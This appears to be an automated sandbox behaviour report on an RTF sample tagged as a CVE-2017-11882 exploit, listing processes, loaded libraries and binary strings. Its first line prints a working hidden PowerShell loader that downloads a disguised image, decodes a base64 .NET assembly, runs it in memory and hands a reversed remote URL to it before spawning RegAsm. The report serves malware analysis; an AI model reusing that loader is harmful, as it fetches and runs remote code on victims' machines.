            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuhaJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
